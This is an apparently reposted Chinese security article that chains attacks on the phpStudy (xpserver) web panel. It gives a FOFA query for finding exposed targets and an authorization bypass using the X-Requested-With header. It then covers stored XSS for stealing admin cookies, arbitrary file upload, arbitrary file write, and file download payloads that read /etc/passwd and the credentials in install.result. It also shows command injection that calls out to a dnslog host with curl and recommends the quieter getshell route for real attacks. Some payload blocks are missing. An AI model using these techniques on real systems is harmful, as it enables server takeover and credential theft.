fofa语句:header="Server: xpserver"
一.未授权访问
小皮面板在安装完会在9080端口放一个登录授权码 这授权码是随机的 但是可以通过绕过直接访问到面板. 加上附加头 X-Requested-With: XMLHttpRequest 即可直接绕过授权码(其实url中带type=vercode也可绕过 但没必要)
二.Xss打Cookie
小皮Phpstudy的面板做的可谓是独具一格,在首页有个查看日志的功能,能显示 xxx 用户登录 并且登录入口未做过滤 可直 接打Xss语句
站长登录进面板 咱们的Cookie就到了
三.后台RCE姿势
当拿到Cookie时 我们要及时进行攻击 否则等站长退出登录或Cookie失效就无法进行攻击了 或者可以另辟蹊径,利用xss 进行Csrf攻击直接构造数据包Getshell或创建管理员.
以下操作无需登录后台 持有Cookie即可操作!!!
任意文件上传getshell(windows+linux)
通过审计发现 serviceappdatabases.php 存在任意文件上传 并未加任何过滤且可穿越目录 造成Getshell
Linux/Windows Payload:
任意文件下载(windows+linux)
通过审计发现 serviceappfiles.php 存在任意文件下载 并未加任何过滤,只需要Base64加密文件路径即可读取任意文 件.
Payload: /service/app/files.php?type=download&file=L2V0Yy9wYXNzd2Q=
小Tips:若install.result文件未被删除,可直接被读取 获取到账密及授权码等信息.(默认不删除的哦)
Payload: /service/app/files.php? type=download&file=L3Vzci9sb2NhbC9waHBzdHVkeS9pbnN0YWxsLnJlc3VsdA==
任意命令执行(Windows+Linux)
serviceapptask.php 存在命令执行漏洞 后台还有计划任务的功能 能直接添加执行shell脚本 直接RCE了.
这里不演示登录后台操作 仅演示未登入后台但持有Cookie操作.
1.先创建计划任务
shell参数为脚本,自己编写 (我写的是curl外带命令dnslog)记住Title
2.查看任务id
3.执行命令
任意命令执行*2(Linux)
/service/app/files.php 存在命令执行漏洞
仔细想了下 既然是创建目录,那么必然是要用mkdir 命令,直接|curl xxxxx.dnslog.cn 验证是否有漏洞
Payload:
任意文件写入(windows+linux)
/service/app/files.php 因未加任何过滤 file_put_contents参数导致任意文件写入漏洞 写入路径基本默认就下述两个
Windows Payload:
Linux Payload:
还有其他的一些杂七杂八的洞这里就不深究了,仅对上述漏洞进行研究,实战建议直接上传文件Getshell 动静小
四.进阶操作 组合拳
基础操作整完了,那必然要整点有用的的,而且Cookie到了也并不能及时去搞,所以直接一条龙
任意文件下载组合拳(Linux)
在xss平台勾选下图模块,并按说明配置 filename里填写网站域名+Payload
这边建议直接读取 install.result 文件:
原文始发于微信公众号(星悦安全):小皮Phpstudy面板1Click RCE
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论